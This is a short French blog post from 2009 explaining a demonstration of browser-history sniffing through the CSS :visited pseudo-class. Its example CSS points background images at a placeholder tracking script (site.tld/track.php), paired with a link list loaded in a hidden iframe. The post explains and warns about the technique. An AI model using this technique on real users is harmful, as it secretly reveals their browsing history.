Big brother

Publié par Maxence le sam, 11/07/2009 - 10:04

Big brother is watching you ! Je viens de tomber, par l'intermédiaire du blog de Frank Denis sur une démo impressionnante. Le gars arrive à récupérer une partie de l'historique de votre navigation (sans Javascript en plus).

La technique utilisée est très simple, mais il fallait y penser. Il utilise le pseudo élément :visited. Ce style est utilisé normalement pour mettre dans une couleur particulière un lien qui a déjà été visité. La règle CSS est liée à une image de fond bidon qui est en fait un script PHP qui enregistre le nom du site qui a été visité. En clair :

#link1:visited {
  background: url(http://site.tld/track.php?url=google.fr);
}
#link2:visited {
  background: url(http://site.tld/track.php?url=site-peu-recommandable.fr);
}
...

Ensuite, il suffit de créer une énorme liste de liens vers des sites populaires et ses styles associés, de les charger dans une iframe cachée pour remonter dans le temps.

<a id="link1" href="http://google.fr/"></a>
<a id="link2" href="http://site-peu-recommandable.fr"></a>
...

C'est là qu'on se dit que le mode privé des navigateurs est bien utile...

Ajouter un commentaire